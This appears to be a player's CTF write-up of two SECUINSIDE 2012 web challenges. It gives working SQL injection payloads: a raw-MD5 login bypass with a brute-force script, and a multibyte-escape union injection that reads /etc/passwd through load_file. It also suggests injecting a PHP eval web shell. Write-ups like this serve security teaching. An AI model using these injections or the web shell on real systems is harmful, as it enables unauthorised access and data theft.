SECUINSIDE 2012 prequals CTF – web writeup (cliph + sqlgeek)
Hello, I participated (as Tasteless) at SECUINSIDE 2012 CTF prequals and really liked it because many webchalls were available. Other guys from team were mostly missing but I suceded in finishing 5 of 6 challs. Here are writeups;
cliph: login bypass using MD5 in raw format
$mpw=md5("$_POST[ip]",true); $q=mysql_fetch_array(mysql_query("select * from member where id='$_POST[id]' and ip='$mpw'"));
in PHP, md5($string,true) will return raw format of MD5 which can have some characters like ‘,“,= etc Now, shortest usable injection is MD5 with ‘=’ somewhere in there. here is small PHP script to get those:
<?php for($i=1;$i<=100000000;$i++) if(strpos(md5($i,true),"'='")>-1)echo $i."\n"; ?>
it gave me few number, I used 2998869 login as
making the query
select * from member where id='admin' and ip='¦-'=':ÚTŕÍ,pžÇ˝ß'
Making it true because in MySQL Select ‘a’=‘b’=‘c’ is true. flag was visible when you login’d as admin. It actually required you to have at lest 2147483647 gold, guess admin had that much…
This is hardest among webchalls. I haven’t really finished it but I was pretty close.
$_GET[view]=mb_convert_encoding($_GET[view],'utf-8','euc-kr'); if(eregi("from|union|select|\(|\)| |\*|/|\t|into",$_GET[view])) exit("Access Denied"); if(strlen($_GET[view])>17) exit("Access Denied"); $q=mysql_fetch_array(mysql_query("select * from challenge5 where ip='$_GET[view]' and (str+dex+lnt+luc)='$_GET[stat]'"));
magic_quotes were ON and I used multibyte character %bf%5c in order to be able to use $_GET[stat] for injection. so,
index.php?view=%bf%5c&stat= or 3=2 union select 1,2,3,4,5,6,7-- -
Now, $_SESSION[read_me]=“/etc/passwd”; tells us to read /etc/passwd so
index.php?view=%bf%5c&stat= or 3=2 union select load_file(0x2f6574632f706173737764),2,3,4,5,6,7-- -
from there I saw ReADDDDDDD______MEEEEEEEEEEEEE.php - and it included your session returning it’s values.
Now I didn’t know what to do - I knew I need to get command execution somehow but didn’t know how.
After CTF ended, user “hvortex” said I could manipulate $_SESSION[id] due to extract($_GET); which I didn’t see…
I guess you could use something like $_SESSION[id]=<?php eval($_GET[cmd]); ?> then include
and read flag. I was wrong, here is whole writeup: Reiners blog
This is one of best webchalls I encountered so far. =)